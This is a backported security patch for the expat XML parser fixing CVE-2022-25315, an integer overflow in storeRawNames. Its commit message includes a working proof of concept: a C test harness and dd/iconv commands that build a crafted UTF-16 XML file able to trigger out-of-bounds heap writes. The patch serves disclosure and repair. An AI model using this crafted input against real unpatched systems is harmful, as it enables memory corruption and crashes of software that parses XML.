summaryrefslogtreecommitdiffstats
path: root/meta/recipes-core/expat/expat/CVE-2022-25315.patch
blob: 24e04dac71e686911a7b8d7df25011156c7fcb2a (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
CVE: CVE-2022-25315
Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/eb036280]

Ref:
* https://github.com/libexpat/libexpat/pull/559

Signed-off-by: Kai Kang <kai.kang@windriver.com>

From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Tue, 15 Feb 2022 11:55:46 +0000
Subject: [PATCH] Prevent integer overflow in storeRawNames

It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.

The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.

Unfortunately (from an attacker point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.

Expat can convert between different encodings. UTF-16 documents which
contain only ASCII representable characters are twice as large as their
ASCII encoded counter-parts.

The proof of concept works by taking these three considerations into
account:

1. Move the m_buffer size slightly below a power of two by having a
   short root node <a>. This allows the m_buffer to grow very close
   to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
   INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
   limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
   which only contains ASCII characters. UTF-16 always stores two
   bytes per character while the tag name is converted to using only
   one. Our attack node byte count must be a bit higher than
   2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
   in sum can overflow INT_MAX.

Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.

Proof of Concept:

1. Compile expat with -fsanitize=address.

2. Create Proof of Concept binary which iterates through input
   file 16 MB at once for better performance and easier integer
   calculations:

```
cat > poc.c << EOF
 #include <err.h>
 #include <expat.h>
 #include <stdlib.h>
 #include <stdio.h>

 #define CHUNK (16 * 1024 * 1024)
 int main(int argc, char *argv[]) {
   XML_Parser parser;
   FILE *fp;
   char *buf;
   int i;

   if (argc != 2)
     errx(1, "usage: poc file.xml");
   if ((parser = XML_ParserCreate(NULL)) == NULL)
     errx(1, "failed to create expat parser");
   if ((fp = fopen(argv[1], "r")) == NULL) {
     XML_ParserFree(parser);
     err(1, "failed to open file");
   }
   if ((buf = malloc(CHUNK)) == NULL) {
     fclose(fp);
     XML_ParserFree(parser);
     err(1, "failed to allocate buffer");
   }
   i = 0;
   while (fread(buf, CHUNK, 1, fp) == 1) {
     printf("iteration %d: XML_Parse returns %d\n", ++i,
       XML_Parse(parser, buf, CHUNK, XML_FALSE));
   }
   free(buf);
   fclose(fp);
   XML_ParserFree(parser);
   return 0;
 }
EOF
gcc -fsanitize=address -lexpat -o poc poc.c
```

3. Construct specially prepared UTF-16 XML file:

```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```

4. Run proof of concept:

```
./poc poc-utf16.xml
```
---
 expat/lib/xmlparse.c | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
index 4b43e613..f34d6ab5 100644
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
   while (tag) {
     int bufSize;
     int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
+    size_t rawNameLen;
     char *rawNameBuf = tag->buf + nameLen;
     /* Stop if already stored.  Since m_tagStack is a stack, we can stop
        at the first entry that has already been copied; everything
@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
     /* For re-use purposes we need to ensure that the
        size of tag->buf is a multiple of sizeof(XML_Char).
     */
-    bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+    rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+    /* Detect and prevent integer overflow. */
+    if (rawNameLen > (size_t)INT_MAX - nameLen)
+      return XML_FALSE;
+    bufSize = nameLen + (int)rawNameLen;
     if (bufSize > tag->bufEnd - tag->buf) {
       char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
       if (temp == NULL)
-- 
2.33.0